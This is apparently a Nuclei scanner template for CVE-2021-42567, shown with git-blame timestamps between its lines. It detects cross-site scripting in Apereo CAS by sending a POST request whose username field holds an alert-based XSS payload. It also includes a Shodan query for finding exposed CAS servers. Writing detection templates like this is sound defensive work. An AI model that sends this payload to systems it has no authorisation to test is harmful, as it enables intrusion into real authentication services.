2021-12-30 11:39:29 +00:00
|
|
|
id: CVE-2021-42567
|
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Apereo CAS Cross-Site Scripting
|
2021-12-30 11:39:29 +00:00
|
|
|
author: pdteam
|
|
|
|
severity: medium
|
2022-02-28 18:05:03 +00:00
|
|
|
description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
|
2021-12-30 11:39:29 +00:00
|
|
|
reference:
|
|
|
|
- https://apereo.github.io/2021/10/18/restvuln/
|
|
|
|
- https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
|
|
|
|
- https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42567
|
|
|
|
- https://github.com/apereo/cas/releases
|
2021-12-30 11:40:55 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-12-30 11:40:55 +00:00
|
|
|
cve-id: CVE-2021-42567
|
|
|
|
cwe-id: CWE-79
|
2023-04-12 10:55:48 +00:00
|
|
|
cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:*
|
|
|
|
epss-score: 0.32182
|
2022-04-22 10:38:41 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2022-04-22 10:38:41 +00:00
|
|
|
shodan-query: http.title:'CAS - Central Authentication Service'
|
|
|
|
tags: cve,cve2021,apereo,xss,cas
|
2021-12-30 11:39:29 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-12-30 11:39:29 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /cas/v1/tickets/ HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '<img/src/onerror=alert(document.domain)>'
|
|
|
|
- 'java.util.HashMap'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 401
|
2022-02-28 18:05:03 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/02/28
|